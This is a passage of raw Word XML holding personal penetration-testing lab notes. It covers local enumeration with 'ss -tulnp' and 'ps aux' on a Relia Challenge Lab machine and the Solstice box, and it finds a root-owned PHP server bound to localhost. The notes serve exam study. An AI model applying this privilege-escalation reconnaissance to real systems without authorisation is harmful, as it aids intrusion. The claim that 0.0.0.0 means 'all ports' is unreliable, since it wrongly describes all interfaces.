        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001636">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001637">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine 192.168.xxx.246. We found a website on port 8000 listening only on local host. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001638">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1600200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="529" name="image514.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image514.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId433"/>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1639">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Relia Challenge Lab .246 machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first two are just DNS, so nothing special</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The third underlined one is a suspicious port 8000 which you can only access locally. This ended up being the attack vector. It's a website you can only access through port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a command used for privilege escalation and it is used to display listening network sockets on a Linux system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000163F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flags explained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001640">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show TCP sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001641">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show UDP sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001642">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show only listening sockets (services waiting for incoming connections).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001643">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show numeric addresses and ports (prevents DNS lookup or service name resolution).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="753"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show the processes using the sockets (requires root privileges or capabilities like CAP_NET_ADMIN).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001645">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001646">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap vs. ss -tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1421"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells you a lot about open ports and services, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gives you different and often deeper insights</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from a local perspective</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001648">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001649">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tulnp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId434">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Solstice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1355"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Paid version of Medium Walkthrough </w:t>
      </w:r>
      <w:hyperlink r:id="rId435">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but just use freedium to make it free</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2819400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="181" name="image176.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image176.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId436"/>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164D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="822"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, 0.0.0.0 means listening on all ports, not just local host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="822"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The write up looks at port 631 and 57 first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000164F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001650">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 57 (127.0.0.1:57) is a working web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001651">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="237" name="image230.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image230.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId437"/>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1652">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001653">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep -i 'root' --color=auto</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001654">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2146300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="556" name="image547.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image547.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43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1655">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001656">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see the output</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which means a PHP built-in development server is running locally (and it happens to be run by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Here's what each part means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001657">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="796"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/php: This is the PHP interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001658">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="796"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-S 127.0.0.1:57: This tells PHP to start a local web server on IP 127.0.0.1 (localhost) and port 57.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001659">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="796"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only local connections can access this (not remote users).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="796"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t /var/tmp/sv/: This sets the document root, meaning all files served via HTTP will come from the /var/tmp/sv/ directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4750192" cy="2405546"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="270" name="image262.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image262.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId439"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4750192" cy="2405546"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000165D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1222"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
